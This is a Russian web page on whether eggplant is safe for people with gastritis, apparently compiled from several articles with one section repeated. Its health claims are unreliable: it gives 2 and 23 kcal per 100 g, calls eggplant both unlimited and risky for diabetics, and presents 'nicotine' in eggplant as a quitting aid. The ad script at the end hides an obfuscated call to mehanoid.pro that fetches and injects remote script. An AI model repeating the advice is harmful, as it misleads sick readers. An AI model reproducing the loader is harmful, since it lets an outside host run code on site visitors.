3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Баклажаны при гастрите польза или вред

Употребление баклажанов при воспалении слизистой желудка

При воспалении слизистой желудка или ее язвенном поражении назначается строгая диета, которая имеет исключения или ограничения. Нельзя употреблять некоторые фрукты и овощи. Что касается баклажанов при гастрите, то можно ли есть их – однозначно ответить нельзя. Существуют некоторые особенности и правила введения в ежедневный рацион.

Преимущественно овощ исключается из питания, т. к. содержит клетчатку, которая стимулирует работу органов пищеварительного тракта, что является нежелательным при гастритах. Все потому, что усиление функций может спровоцировать обострение патологии.

Польза баклажанов

В овоще содержится достаточное количество необходимых микроэлементов для организма человека. Даже пройдя термическую обработку или консервирование, он не потеряет своей ценности. Пектин в составе баклажана стимулирует процесс пищеварения, предотвращает застой желчи. Благодаря этому элемент, выводится лишнее количество холестерина.

Баклажан считается низкокалорийным, его часто включают в диету при похудении. В овоще есть калий, который улучшает работу сердечно-сосудистой системы, помогает вывести лишнюю жидкость из организма. Он может включаться в рацион при остеохондрозе, остеопорозе, атеросклерозе.

Вред и противопоказания к употреблению овоща

Баклажаны при гастрите могут привести к осложнениям при неправильном приготовлении или выборе. Перезревший плод содержит такое органическое соединение, как соланин. Для человека он считается ядовитым и может привести к отравлению.

В баклажанах содержится всего 0,3% этого вещества, именно оно придает горький вкус. По внешнему виду можно определить его присутствие, овощ имеет местами коричневатый оттенок. Больше соланина находится в кожуре. Вредно употреблять перезревшие, старые, помятые плоды, там концентрация яда увеличена. Чтобы его убрать, баклажан жарят на масле или вымачивают в соленой воде.

Отравление может наступить после попадания внутрь организма 200-400 мг ядовитого вещества, это примерно до 4 кг овощей. Если есть плод без коричневых пятен, не перезревший, это понижает риск попадания соланина в таком количестве.

Легкая степень интоксикации проявляется следующими симптомами:

  • боль в голове, животе;
  • диарея;
  • тошнота, рвота;
  • повышенная температура тела.

При высокой степени добавляются признаки поражения центральной нервной системы. Противоядием является яичный белок, молоко, супы слизистой консистенции. При возникновении таких симптомов необходимо обращаться за медицинской помощью.

Овощ употребляется с особой осторожностью при заболеваниях пищеварительного тракта, и только после разрешения врача. Запрещено кушать баклажаны тем, у кого есть непереносимость этого продукта.

Противопоказаниями является острая форма воспаления желудка, язва двенадцатиперстной кишки, патологии печени, поджелудочной железы или желчного пузыря.

Баклажан при гастрите

Спелый плод можно употреблять на острой стадии заболевания, но только после предварительной кулинарной обработки. В ином случае от него лучше временно отказаться. При обострении патологии слизистая оболочка органа истончена, а при попадании грубой клетчатки увеличивается риск ее травматизации.

В составе баклажанов есть аскорбиновая кислота, она может приводить к раздражению нервных окончаний, что влечет за собой усиление выработки желудочного сока, повышение кислотности.

При хронической форме нет как таковых запретов на употребление овоща. Единственное, это есть его нужно в умеренном количестве, до 300 г за один раз и после предварительной термической обработки.

Выбор баклажанов

Покупать желательно свежие плоды. С виду у них гладкая поверхность, равномерный окрас кожуры и довольно сочная плодоножка. Если овощ скользкий или покрыт мягкими коричневыми пятнами, его лучше обойти стороной. Стоит обратить внимание на белый цвет кожицы, она менее вредна.

Так как жарить на масле пищу запрещено при гастрите, то чтобы перестраховаться и убрать вредное вещество, можно замочить продукт перед приготовлением в соленой воде на полчаса.

Правильное приготовление овоща

Блюда с баклажанами не должны содержать других компонентов, способных раздражать слизистую желудка, например, чеснок, лук, майонез. Разрешается его запекать в духовке, это сохранит максимум полезных элементов.

От жарки лучше отказаться даже при хронической форме, потому что этот процесс приготовления уничтожает почти все нужные вещества, оставляя клетчатку, поэтому от такого продукта получается только вред.

Можно делать баклажанный сок или смузи из овощей. Плод нарезается кубиками и забрасывается в кастрюлю с водой, ставится на плиту. После закипания оставляется до 15 минут на огне и снимается. Как остынет, взбивается в блендере с водой и протирается через сито.

Овощ разрешено употреблять при хронической форме гастрита в период ремиссии. В остальных случаях этого делать не рекомендуется. До введения в рацион баклажанов лучше проконсультироваться с врачом.

Какими полезными свойствами обладает баклажан, расскажет видео:

Польза баклажанов при гастрите и диабете

Употреблять баклажаны при гастрите и диабете стоит с осторожностью. Овощ обладает как полезными, так и вредными свойствами. Лучше изучить все нюансы употребления культуры, чтобы уберечь организм от стресса.

Польза баклажанов при гастрите и диабете

Состав баклажанов

Полезные свойства плодов определяются их хорошим составом:

  • аскорбиновая кислота;
  • несколько видов каротина;
  • витамины группы РР;
  • клетчатка и пектин.

Польза для организма

Баклажан полезен за счет присутствия в составе фолиевой кислоты, которая способна укреплять стенки капилляров. В результате распространение крови по организму происходит быстрее. Микроэлементы, содержащиеся в составе овоща, положительо влияют на защиту организма от внешних радикалов и негативного воздействия окружающей среды.

Регулярное потребление свежих или печеных долек продукта приводит к замедлению процесса старения:

  • улучшается состояние кожи;
  • выравниваются мелкие морщинки;
  • пропадают пигментные пятна и высыпания на лице.

Польза определяется и тем, что они способны выводить из внутренних органов излишний холестерин. Это приводит к снижению вероятности развития атеросклероза. Клетчатка и пектин положительно сказываются на состоянии крови (приводят липидный уровень кровеносной системы в норму).

Отмечают еще ряд полезных свойств баклажанов:

  • Рекомендованы к употреблению при анемии. В их составе есть кобальт, который синтезирует показатели гемоглобина в организме.
  • Характеризуются низкой калорийностью.
  • Содержат в составе никотин, поэтому подходят людям, стремящимся бросить курить.

Употребление баклажана при сахарном диабете позволяет достичь ремиссии.

Баклажаны при сахарном диабете

Овощ полезен при многих заболеваниях

Разрешено употребление баклажанов при сахарном диабете 2 типа. Этому есть несколько объяснений.

  • Овощи снижают уровень холестерина в организме.
  • Продукт имеет низкую калорийность, поэтому после его употребления не последует набора веса или увеличения сахара в крови.
  • Плод содержит в составе повышенную концентрацию полезных витаминов и микроэлементов, способных снизить уровень сахара.

Баклажаны используются диабетиками для нормализации и регулирования уровня инсулина. Организм лучше впитывает жиры, полученные во время еды, благодаря чему снижается давление на поджелудочную железу.

Фиолетовые овощи обладают защитными свойствами для печени, поэтому жирная пища быстрее усваивается и не наносит вреда.

Баклажаны и поджелудочная железа взаимосвязаны. В составе овощей содержится цинк, который способствует выработке инсулина — ткани лучше усваивают глюкозу, происходит быстрый процесс заживления ран или трещин на теле. Также этот микроэлемент способствует укреплению имунной системы. Баклажаны при сахарном диабете 2 типа разрешено употреблять, потому что они улучшают работу поджелудочной железы.

Баклажаны при сахарном диабете 2 типа разрешены к употреблению и из-за небольшой калорийности. В составе продукта содержится всего 2 ккал (в расчете на 100 г овоща), поэтому его употребление не повышает уровень сахара в организме, а напротив, способствует его снижению.

Гликемический индекс фиолетовых овощей составляет число 15. Это значит, что позволено употреблять баклажаны при сахарном диабете в неограниченных количествах. Если уровень гликемии продукта низкий, он не будет резко повышать сахар: чувство сытости наступает быстрее и держится намного дольше. Это отличный вариант для тех, кто следит за своим весом или пытается похудеть.

Применение при гастрите

Информации о том, что нельзя кушать баклажаны при заболевании гастритом, нет. Но лучше потреблять этот продукт запеченным и в небольших количествах.

В составе баклажанов есть витамин С, способный усиливать кислотностью желудка и кишечника. Стенки органов становятся тоньше, что приводит к новой стадии болезни — язве. Стоит придерживаться оптимальной дозировки продукта — не более 200 г за 1 прием пищи.

При язве желудка

При язве желудка этот овощной продукт запрещен к употреблению. Причина — наличие кислоты в его составе, которая способна привести к рецидиву.

Не разрешается кушать жареные дольки овоща, их нужно только запекать или использовать в свежих овощных салатах. Запрещено добавлять в приготовленные блюда специи или добавки: сметану, майонез, приправы. Эти ингредиенты способствуют развитию язвы желудка.

Вред баклажанов

Согласно противопоказаниям, нельзя кушать баклажаны при панкреатите или энтероколите. Это связано с содержанием в них клетчатки, которая способна усиливать болевые ощущения в области кишечника.

Фиолетовые овощи способны приносить вред при холецистите или гепатите. Это связано с тем, что микроэлементы в их составе выводят желчь из организма.

Нельзя кушать переспелую продукцию. Соланин, возникающий после созревания, приводит к пищевому отравлению.

Баклажаны наносят вред при регулярном употреблении людьми с камнями в почках. Оксалат — элемент состава овоща, способствующий их формированию.

Нельзя кушать продукт при вздутии живота или аллергии.

Баклажаны при гастрите: польза или вред

В России этот овощ появлялся уже давно, еще в 17 веке. Не секрет, что такое заболевание пищеварительного тракта, как гастрит, значительно ограничивает спектр используемых в пищу продуктов питания. Для контроля за заболеванием больному приходится придерживаться ряда ограничений, в том числе под некоторые ограничения попадают и баклажаны при гастрите. Несмотря на массу полезных свойств данного овоща, в нём содержится большое количество клетчатки, которая оказывает грубое действие на воспалённую слизистую оболочку желудка.

Можно ли кушать баклажаны при гастрите

Однозначного запрета на употребление таких овощей в пищу при гастрите нет, однако в стадии обострения воспалительного процесса в слизистой оболочке желудка употребления данного овоща лучше избегать, однако можно есть при хроническом гастрите баклажаны в щадящей кулинарной обработке. При обострении гастрита слизистая истончена и находится в уязвимом состоянии, а так как в состав баклажана входит большое количество клетчатки, то и риск механического повреждения или травматизации слизистой увеличивается. Еще один компонент, который входит в состав, – аскорбиновая кислота, также рефлекторно может приводить к перераздражению нервных вегетативных окончаний, что может повлечь за собой усиление секреции желудочного сока и повышение его кислотности. Что касается употребления баклажанов при хронической форме гастрита в компенсированной стадии, то тут явных запретов нет. Стоит лишь соблюдать адекватные объёмы порций продукта. Большинство специалистов не рекомендуют употреблять более 300 грамм данного овоща за раз.

Польза и вред

Те люди, которые активно используют баклажан в различных способах приготовления в своём пищевом рационе, в меньшей степени страдают сердечно-сосудистыми заболеваниями, кишечными расстройствами, а также испытывают значительно более меньшие проблемы с суставами и позвоночным столбом. Такой овощ, как баклажан, обладает целым рядом полезных для здоровья свойств:
  • Обладает большим количеством витаминов и минералов, например, витаминами группы В, С, РР, а также микроэлементами калий, кальций, фосфор, железо. За счёт витамина С этот овощ является отличным средством профилактики простудных заболеваний и гриппа. Его применяют в диетах у больных после серьёзных сердечно-сосудистых заболеваний (инфаркт миокарда или инсульт), за счёт оказания положительного эффекта на сердце и сосудистую стенку, снижает уровень холестерина и других атерогенных липопротеидов при систематическом употреблении в пищу.
  • Употребление баклажанов помогает снизить зависимость от никотиновой кислоты, что помогает в борьбе с курением.
  • Мочегонное действие и выведение уратов. Именно по этой причине баклажан рекомендуется к употреблению пожилым людям, которые страдают почечной недостаточностью, мочекаменной болезнью или подагрой.
  • Обладает активным желчегонным эффектом, т.е. усиливает отделение желчи, тем самым нормализуя пищеварение. Применяется при дискинезии желчного пузыря, холецистите и панкреатите. Нормализует перистальтику кишечника.
  • Нормализует моторику кишечника и восстанавливает микрофлору и биоценоз кишечной стенки. Данный овощ показывает хороший эффект при употреблении во время длительных запоров иди функциональной непроходимости кишечника.

Добавление баклажана в рацион полезно для пар, планирующих беременность, и непосредственно беременным, за счёт большого содержания в данном овоще фолатов и железа.

Но не обходится и без негативных сторон. При кулинарной обработке нужно быть осторожным, так как овощ при обжаривании в масле впитывает в себя много растительного масла.

  • За счёт низкой калорийности (всего 23 ккал на 100 г) не рекомендуется использовать больным с сахарным диабетом, так как в них мало углеводов, и баклажан может спровоцировать гипогликемическое состояние. Не рекомендуется использовать при расстройствах кишечника, так как баклажан способен значительно усилить диарею.
  • Перезрелый овощ содержит токсическое вещество соланин, которое может привести к отравлению организма. Интоксикация проявляется приступами тошноты и рвоты, кишечными коликами, могут быть судороги и бредовые состояния.

Важно! Будьте аккуратны при выборе баклажана и его кулинарной обработке!

Меры предосторожности и противопоказания

Противопоказаниями к употреблению в любом виде баклажанов являются такие состояния, как гастрит в стадии обострения, язвенная болезнь желудка и двенадцатиперстной кишки, заболевания поджелудочной железы, в частности, острый панкреатит, заболевания печени и желчного пузыря.

Обязательно серьёзно относитесь к выбору баклажанов, так как в них может содержаться токсический компонент – соланин. Старайтесь покупать только свежие овощи.

У свежих корнеплодов гладкая слегка влажная поверхность, равномерная окраска кожицы, сочная плодоножка. А вот скользкие овощи с большими коричневыми пятнами лучше не брать. Во избежание отравления и обострения воспалительного процесса при гастрите перед готовкой следует замочить овощ в солёной воде на 30-40 минут. Лучше всего использовать белые баклажаны.

Особенности употребления

При хроническом гастрите рекомендуется есть баклажаны небольшими порциями, не более 300 грамм. При этом блюдо не должно содержать иных раздражающих компонентов, например, чеснока или майонеза, которые часто подают вместе с баклажанами. Даже в период ремиссии старайтесь избегать жареных блюд на основе таких овощных продуктов, так как они содержат минимум питательных и витаминных веществ, однако грубую клетчатку сохраняют, что не добавляет пользы от их употребления.

Для людей, у которых при употреблении баклажанов часто возникает дискомфорт и даже болевые ощущения, но овощ хочется кушать, альтернативой может стать приготовление сока или овощного смузи с добавлением баклажанов.

Можно ли баклажаны при гастрите: аргументы за и против, допустимые способы употребления

Гастрит – это воспаление слизистой желудка, которое приводит к нарушению переработки пищи. Комплексное лечение предусматривает прием лекарственных препаратов и соблюдение строгой диеты с запретом некоторых овощей и фруктов.

Что касается баклажанов, то их употребление вводится в рацион по определенным нормам. О том, можно ли употреблять баклажаны при гастрите, а в каких лучше полностью исключить, мы расскажем в этой статье.

Можно ли употреблять баклажаны при гастрите

Дать однозначный ответ на вопрос о целесообразности употребления баклажанов при гастрите сложно. Во внимание принимается состояние желудочно-кишечного тракта, сопутствующие патологии, стадию и форму заболевания.

Аргументы за и против

Овощ содержит большое количество клетчатки, которая усиливает перистальтику кишечника и активирует работу желудка. Поэтому продукт рекомендуют употреблять при гастрите с пониженной секрецией желудочного сока.

При повышенной кислотности употребление баклажанов провоцирует обострение болезни, вызывая сильнейший дискомфорт. Это объясняется содержанием витамина С, который раздражает нервные окончания и стимулирует секрецию желудочного сока. В этом случае от овоща лучше отказаться.

Польза и вред

Овощ содержит большое количество витаминов, микро- и макроэлементов:

Баклажаны рекомендуется включать в меню людям, которые пытаются бросить курить. Плоды содержат витамин РР, который помогает легче переносить никотиновое голодание. Даже после термообработки овощ не теряет свою ценность.

Пектин нормализует процесс переваривания пищи, предупреждает застой желчи, выводит холестерин.

Калий улучшает работу сердечной мышцы и сосудов, уменьшает отечность тканей.

Что касается негативного воздействия на желудок людей, страдающих гастритом, то осложнения возникают при несоблюдении правил выбора и приготовления.

Особенности употребления

При гастрите желательно есть молодые плоды с минимальным содержанием семечек и нежной мякотью. В зависимости от формы заболевания, специалист назначает тип диеты с четким указанием количества приемов пищи, наименованием разрешенных продуктов и способом готовки.

Допустимые нормы

При хронической форме гастрита разрешается употреблять баклажаны маленькими порциями – по 200-300 г. В блюдо нельзя добавлять свежий лук, чеснок, майонезный соус, острые приправы. Употребление этих продуктов усугубляет состояния больного.

В каком виде есть

Если вы посмотрите примерный вариант диеты при гастрите, то заметите, что термообработку продуктов проводят без обжаривания в масле. Это ключевой момент. Правильно приготовленная пища позволяет быстро нормализовать состояние, избавиться от неприятных ощущений.

Учитывая то, что мякоть баклажанов имеет пористую структуру, при жарке они впитывают растительное масло. При гастрите допустимо употребление только тушеных, запеченных, паровых и отварных овощей.

При остром и хроническом гастрите

Молодые баклажаны рекомендуется употреблять в стадии обострения только после термической обработки. В этот период слизистая оболочка желудка истончается, а грубая клетчатка может ее травмировать.

При хроническом гастрите, в период затихания симптоматики, нет особых запретов на употребление баклажанов. Врачи лишь рекомендуют соблюдать норму – не более 300 г в день.

Употребление при гастрите с повышенной и пониженной кислотностью

При повышенной кислотности желудка врачи рекомендуют включить в рацион овощи фиолетового цвета. Они предотвращают развитие заболеваний пищеварительного тракта. Но баклажаны при гастрите такой формы есть запрещено.

Овощи содержат аскорбиновую кислоту, которая вызывает раздражение нервных корешков. В результате выработка желудочного сока усиливается, что приводит к повышению кислотности. Поэтому баклажаны можно есть только при гастрите с пониженной кислотностью.

Выбор и правильное приготовление овоща

Вне зависимости от состояния ЖКТ, в пищу желательно употреблять молодые баклажаны. Возраст плода определяют по кожице и плодоножке. У ранних овощей зеленая плодоножка и темно-фиолетовая гладкая кожица без коричневых вкраплений.

Совет. Обратите внимание на белые баклажаны. Их кожица намного тоньше, чем у фиолетовых плодов.

Баклажаны можно запекать в духовке, чтобы сохранить больше полезных веществ. При хронической форме гастрита лучше отказаться от жареных овощей.

Тем, кто не может отказаться от баклажанов, но каждый раз ощущает дискомфорт при их употреблении, в качестве альтернативного варианта можно добавлять небольшое количество баклажанов в овощные смузи. Мякоть при этом предварительно бланшируют в течение 10 минут.

Меры предосторожности

Переспелые плоды содержат 0,3% соланина. Это токсичное вещество, которое придает горечь, окрашивает мякоть в коричневатый оттенок и провоцирует отравление организма. Больше всего соланина в шкурке.

В старых, поврежденных, подгнивших овощах концентрация токсина намного больше, нежели в молодых. Чтобы избавиться от соланина, баклажан тушат с небольшим количеством масла после предварительного вымачивания в подсоленной воде.

Важно! Отравление наступает в случае, если в организм попадет 200-400 мг ядовитого вещества. Для этого придется съесть около 4 кг баклажанов.

Признаки отравления:

  • головная боль;
  • шум в ушах;
  • боль в желудке;
  • тошнота;
  • рвота;
  • понос;
  • лихорадка.

В качестве противоядия используют белок куриного яйца, овсяный отвар, молоко. В тяжелых случаях показана немедленная госпитализация.

Противопоказания

Врачи советуют исключить баклажаны из рациона людям, страдающим:

  • гастритом в период обострения;
  • пониженной кислотностью желудка;
  • язвенными и эрозивными заболеваниями ЖКТ;
  • острым панкреатитом;
  • нарушениями работы желчного пузыря и печени;
  • аллергией на продукт.

Заключение

Баклажан – полезный овощ с массой питательный веществ, витаминов и минералов. Но пользу он приносит лишь при правильном приготовлении и соблюдении норм введения в рацион людей, имеющих проблемы с пищеварительной системой. При гастрите овощи можно употреблять, но лишь после консультации специалиста.

Баклажаны при гастрите: польза или вред

В России этот овощ появлялся уже давно, еще в 17 веке. Не секрет, что такое заболевание пищеварительного тракта, как гастрит, значительно ограничивает спектр используемых в пищу продуктов питания. Для контроля за заболеванием больному приходится придерживаться ряда ограничений, в том числе под некоторые ограничения попадают и баклажаны при гастрите. Несмотря на массу полезных свойств данного овоща, в нём содержится большое количество клетчатки, которая оказывает грубое действие на воспалённую слизистую оболочку желудка.

Можно ли кушать баклажаны при гастрите

Однозначного запрета на употребление таких овощей в пищу при гастрите нет, однако в стадии обострения воспалительного процесса в слизистой оболочке желудка употребления данного овоща лучше избегать, однако можно есть при хроническом гастрите баклажаны в щадящей кулинарной обработке. При обострении гастрита слизистая истончена и находится в уязвимом состоянии, а так как в состав баклажана входит большое количество клетчатки, то и риск механического повреждения или травматизации слизистой увеличивается. Еще один компонент, который входит в состав, – аскорбиновая кислота, также рефлекторно может приводить к перераздражению нервных вегетативных окончаний, что может повлечь за собой усиление секреции желудочного сока и повышение его кислотности. Что касается употребления баклажанов при хронической форме гастрита в компенсированной стадии, то тут явных запретов нет. Стоит лишь соблюдать адекватные объёмы порций продукта. Большинство специалистов не рекомендуют употреблять более 300 грамм данного овоща за раз.

Польза и вред

Те люди, которые активно используют баклажан в различных способах приготовления в своём пищевом рационе, в меньшей степени страдают сердечно-сосудистыми заболеваниями, кишечными расстройствами, а также испытывают значительно более меньшие проблемы с суставами и позвоночным столбом. Такой овощ, как баклажан, обладает целым рядом полезных для здоровья свойств:

  • Обладает большим количеством витаминов и минералов, например, витаминами группы В, С, РР, а также микроэлементами калий, кальций, фосфор, железо. За счёт витамина С этот овощ является отличным средством профилактики простудных заболеваний и гриппа. Его применяют в диетах у больных после серьёзных сердечно-сосудистых заболеваний (инфаркт миокарда или инсульт), за счёт оказания положительного эффекта на сердце и сосудистую стенку, снижает уровень холестерина и других атерогенных липопротеидов при систематическом употреблении в пищу.
  • Употребление баклажанов помогает снизить зависимость от никотиновой кислоты, что помогает в борьбе с курением.
  • Мочегонное действие и выведение уратов. Именно по этой причине баклажан рекомендуется к употреблению пожилым людям, которые страдают почечной недостаточностью, мочекаменной болезнью или подагрой.
  • Обладает активным желчегонным эффектом, т.е. усиливает отделение желчи, тем самым нормализуя пищеварение. Применяется при дискинезии желчного пузыря, холецистите и панкреатите. Нормализует перистальтику кишечника.
  • Нормализует моторику кишечника и восстанавливает микрофлору и биоценоз кишечной стенки. Данный овощ показывает хороший эффект при употреблении во время длительных запоров иди функциональной непроходимости кишечника.

Добавление баклажана в рацион полезно для пар, планирующих беременность, и непосредственно беременным, за счёт большого содержания в данном овоще фолатов и железа.

Но не обходится и без негативных сторон. При кулинарной обработке нужно быть осторожным, так как овощ при обжаривании в масле впитывает в себя много растительного масла.

  • За счёт низкой калорийности (всего 23 ккал на 100 г) не рекомендуется использовать больным с сахарным диабетом, так как в них мало углеводов, и баклажан может спровоцировать гипогликемическое состояние. Не рекомендуется использовать при расстройствах кишечника, так как баклажан способен значительно усилить диарею.
  • Перезрелый овощ содержит токсическое вещество соланин, которое может привести к отравлению организма. Интоксикация проявляется приступами тошноты и рвоты, кишечными коликами, могут быть судороги и бредовые состояния.

Важно! Будьте аккуратны при выборе баклажана и его кулинарной обработке!

Меры предосторожности и противопоказания

Противопоказаниями к употреблению в любом виде баклажанов являются такие состояния, как гастрит в стадии обострения, язвенная болезнь желудка и двенадцатиперстной кишки, заболевания поджелудочной железы, в частности, острый панкреатит, заболевания печени и желчного пузыря.

Обязательно серьёзно относитесь к выбору баклажанов, так как в них может содержаться токсический компонент – соланин. Старайтесь покупать только свежие овощи.

У свежих корнеплодов гладкая слегка влажная поверхность, равномерная окраска кожицы, сочная плодоножка. А вот скользкие овощи с большими коричневыми пятнами лучше не брать. Во избежание отравления и обострения воспалительного процесса при гастрите перед готовкой следует замочить овощ в солёной воде на 30-40 минут. Лучше всего использовать белые баклажаны.

Особенности употребления

При хроническом гастрите рекомендуется есть баклажаны небольшими порциями, не более 300 грамм. При этом блюдо не должно содержать иных раздражающих компонентов, например, чеснока или майонеза, которые часто подают вместе с баклажанами. Даже в период ремиссии старайтесь избегать жареных блюд на основе таких овощных продуктов, так как они содержат минимум питательных и витаминных веществ, однако грубую клетчатку сохраняют, что не добавляет пользы от их употребления.

Для людей, у которых при употреблении баклажанов часто возникает дискомфорт и даже болевые ощущения, но овощ хочется кушать, альтернативой может стать приготовление сока или овощного смузи с добавлением баклажанов.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};